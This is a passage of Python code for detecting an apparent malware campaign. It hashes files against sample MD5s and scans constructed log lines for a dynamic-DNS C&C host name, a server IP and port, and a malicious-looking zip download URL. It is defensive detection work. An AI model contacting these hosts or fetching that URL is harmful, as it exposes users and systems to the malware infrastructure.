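def md5_matches(data):
    """True if the file body hashes to one of the listed sample MD5s."""
    return hashlib.md5(data).hexdigest() in IOCS["md5"]


SAMPLE_LOG = [  # constructed log lines, not from a real incident
    "2017-07-15T10:02:11Z dns query client=10.0.0.7 name=swez111.ddns.net type=A",
    "2017-07-15T10:02:12Z fw allow 10.0.0.7:49213 -> 173.254.223.81:20000 proto=tcp",
    "2017-07-15T10:05:40Z proxy GET http://belkomsolutions.com/t/guangzhou%20sonicstar%20electronics%20co%20ltd.zip 200",
    "2017-07-15T10:06:00Z dns query client=10.0.0.9 name=example.org type=A",
]


def scan_logs(lines=SAMPLE_LOG):
    """(line index, hit) pairs across a batch of log lines."""
    return [(i, hit) for i, line in enumerate(lines) for hit in scan_log_line(line)]
```

The C&C is on a dynamic-DNS provider (ddns.net), so the domain match is kept on the full host name rather than the provider's domain; matching on the IP and port separately catches the case where the operator moves the host name but keeps the same server.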